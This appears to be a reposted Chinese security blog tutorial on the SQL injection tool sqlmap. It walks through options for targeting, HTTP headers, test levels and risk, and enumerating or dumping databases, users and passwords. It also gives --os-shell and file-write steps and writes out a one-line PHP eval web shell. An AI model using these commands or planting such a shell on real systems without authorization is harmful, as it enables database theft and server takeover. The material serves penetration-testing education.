渗透必备工具|sqlmap
2022-8-16 00:1:46 Author: 橘猫学安全(查看原文) 阅读量:27 收藏

今天和大家分享的是工具——sqlmap。想要获取sqlmap工具资源的小伙伴在公众号回复sqlmap自动获取即可。

Sqlmap简介

sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。

支持的数据库:MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。

sqlmap支持五种不同的注入模式:

UNION query SQL injection(可联合查询注入) 

Error-based SQL injection(报错型注入) 

Boolean-based blind SQL injection(布尔型注入) 

Time-based blind SQL injection(基于时间延迟注入) Stacked queries SQL injection(可多语句查询注入)

设置目标URL

-u  /--url

最基本格式  sqlmap  -u“http://www.target.com/index.php?id=1”

-m

从文本中获取多个目标扫描,但是每一行只能有一个url. 

sqlmap -m urllist.txt

-r

从文件中加载HTTP请求,这样的话 就不需要在去设定cookie,POST数据......等等。

设置回显等级

参数:-v 默认为1:

0、只显示python错误以及严重的信息。

1、同时显示基本信息和警告信息。(默认等级)

2、同时显示debug信息。

3、同时显示注入的payload。

4、同时显示HTTP请求。

5、同时显示HTTP响应头。

6、同时显示HTTP响应页面。

设置HTTP数据包相关参数

参数:--data

此参数是把data后面的数据以POST方式提交,sqlmap会像检测GET参数一样检测POST提交过去的参数。

python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1"  

参数:--cookie

当web需要登录的时候,需要我们抓包获取cookie参数,然后复制出来,加到--cookie参数中。

--cookie=”Cookie: Hm_lvt6910067,1546929561,1547001094,1547024662; PHPSESSID=o64fbvo316lg59njufl2gfutm4; ”

HTTP User-Agent头

参数:--user-agent

默认情况下sqlmap的HTTP请求头中的User-Agent值是:sqlmap/1.0-dev-xxxxxxxxx(http://sqlmap.org)

这个时候可以手动指定伪造一个User-Agent。

sqlmap  -u “http://www.target.com” --level 3 --user-agent=”aaaaaa” --dbs

参数:--random-agent  会从/usr/share/sqlmap/data/txt/user-agents.txt中随机产生User-Agent头。

sqlmap  -u “http://www.target.com” --level 3 --random-agent --dbs

sqlmap 检查uesr-agent中的注入点, level>=3才会去检查user-agent头是否存在注入漏洞

HTTP Referer头

参数:--referer

sqlmap可以在请求中伪造HTTP中的referer。

sqlmap  -u “http://www.target.com/?id=1”  --referer=”http://www.baidu.com”

当--level参数设定>=3时,会尝试进行referer注入。

--delay

可以设定两个http请求间的延迟,设定为1的时候是1秒,默认是没有延迟的。

--timeout

可以设定一个http请求超过多少秒判定为超时,默认是30秒。

指定测试参数

-p ,

sqlmap 默认会测试所有的GET和POST参数,当--level的值大于等于2的时候也会测试HTTP Cookie头的值,当大于等于3的时候也会测试User- Agent和HTTP Referer头的值。

例如:-p “id,user-agent”

--skip

在使用--level时,级别很大的时候,但是有些参数不能去测试,那么可以使用--skip参数跳过。

例如:--skip=”user-agent,referer”

设定探测等级

--level  (sqlmap -r 情况下)

共有五个等级,默认为1,sqlmap使用的payload可以在  xml/payloads.xml中看到,自己也可以根据相应的格式添加自己的payload。

level>=2的时候就会测试HTTP Cookie。

level>=3的时候就会测试HTTP User-Agent/Referer头。

level=5 的时候会测试HTTP Host。

设定探测风险等级

--risk

共有三个风险等级,1-3,

默认是1会测试大部分的测试语句,

2会增加基于时间的测试语句,

3会增加OR语句的SQL注入测试。

在有些时候,例如在UPDATE,DELETE的语句中,注入一个OR的测试语句,可能导致更新的整个表,可能造成很大的风险。

列数据

--dbs,--users,--passwords,--is-dba可以判断当前权限

--technique :指定使用哪种注入类型

速度排序=联合(U)>报错(E)>布尔(Bool)>延迟(Time)

--current-db  当前数据库

--privileges 权限

-D database_name --tables

-D database_name  -T table_name --columns

-D database_name -T table_name -C column_1,column_2  --dump

--dump-all 将整个数据库的所有数据进行打包

一些常用的参数

--users 列数据库管理用户,当前用户有权限读取包含所有用户的表的权限时,就可以列出所有管理用户。

--current-user 在大多数据库中可以获取到管理数据的用户。

--is-dba   判断当前的用户是否为管理,是的话会返回True。

--privileges 当前用户有权限读取包含所有用户的表的权限时,很可能列举出每个用户的权限,sqlmap将会告诉你哪个是数据库的超级管理员。也可以用-U参数指定你想看那个用户的权限。

--proxy 指定一个代理服务器  eg: –proxy http://local:8080

select * from users where id=((((‘???????')))) 

--prefix=PREFIX 注入payload字符串前缀

–suffix=SUFFIX 注入payload字符串后缀

eg:sqlmap -u “www.target.com/index.php?id=1” -p id --prefix “'))))” 

--suffix “AND ('1'='1”

使用shell命令

参数--os-shell

前提:需要网站的物理路径,其次是需要有FILE权限。Root权限+secure-file-priv != null

sqlmap -r “C:\sqlmap\request.txt” -p id  --dms mysql --os-shell 

接下来指定网站可写目录:

“C:\www”

d:\phpstudy\www   (成功)

 echo ^<?php @eval($_GET['x']); ?^> >shell1.php

sqlmap -u “www.a.com/1.php?id=1” --file-write=”d:/2.txt” 

--file-dest=”E:/wwwroot/bihuoedu/one.php“

--batch 全自动

--start=开始条数 --stop=结束条数

--purge 清空缓存目录 

--sql-shell  反弹sqlshell,类似于sql查询分析器

默认路径.sqlmap (点sqlmap)

转自:安全小菜姬

推荐阅读

实战|记一次奇妙的文件上传getshell

「 超详细 | 分享 」手把手教你如何进行内网渗透

神兵利器 | siusiu-渗透工具管理套件

一款功能全面的XSS扫描器

实战 | 一次利用哥斯拉马绕过宝塔waf

BurpCrypto: 万能网站密码爆破测试工具

快速筛选真实IP并整理为C段 -- 棱眼

自动探测端口顺便爆破工具t14m4t

渗透工具|无状态子域名爆破工具(1秒扫160万个子域)

查看更多精彩内容,还请关注橘猫学安全:

每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247496584&idx=2&sn=0dcba139a3bea79c0b746d08d28e9957&chksm=c04d74b6f73afda0a0c9b1957cd5a1ef74766cc22b3f75c2d794136165e3898a16a6b9ad3164#rd
如有侵权请联系:admin#unsafe.sh